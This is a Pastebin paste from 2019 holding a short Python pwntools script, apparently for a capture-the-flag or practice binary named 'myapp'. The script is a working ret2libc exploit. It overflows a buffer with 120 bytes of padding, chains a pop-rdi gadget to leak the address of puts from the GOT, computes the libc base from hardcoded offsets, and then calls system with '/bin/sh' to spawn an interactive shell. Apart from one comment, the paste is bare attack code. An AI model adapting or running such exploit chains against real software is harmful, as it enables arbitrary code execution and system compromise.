SHARE
TWEET

Untitled

a guest Sep 20th, 2019 101 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2. # Here we define the context of the exploit, it is for linux os and amd64 archeticture
  3. context(os='linux', arch='amd64')
  4. put_plt_addr = p64(0x401030)
  5. put_got_addr = p64(0x404018)
  6. main_plt_addr = p64(0x401094)
  7. pop_rdi_gadget = p64(0x401090)
  8.  
  9. junk = 'A'*120
  10. payload = junk
  11. payload += pop_rdi_gadget
  12. payload += put_got_addr
  13. payload += put_plt_addr
  14. payload += main_plt_addr
  15. #print(payload)
  16.  
  17. p = process("./myapp")
  18. print(p.recvuntil("back?"))
  19. #print(p.recv())
  20. #print(p.recv())
  21. #print(p.recv())
  22. p.sendline(payload)
  23. p.recvuntil("\n")
  24. leaked = p.recv()[:8].strip().ljust(8, "\x00")
  25. log.success("Leaked Address = " +str(leaked))
  26.  
  27. leaked = u64(leaked)
  28.  
  29. puts_libc = 0x71910
  30. system_libc = 0x449c0
  31. sh_libc = 0x181519
  32. offset = leaked - puts_libc # offset between any function in the program and its address in libc
  33. sys = p64(offset+system_libc)
  34. sh = p64(offset+sh_libc)
  35.  
  36.  
  37. payload2 = junk
  38. payload2 += pop_rdi_gadget
  39. payload2 += sh
  40. payload2 += sys
  41.  
  42.  
  43. p.recvuntil("back?")
  44. p.sendline(payload2)
  45.  
  46. p.interactive()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top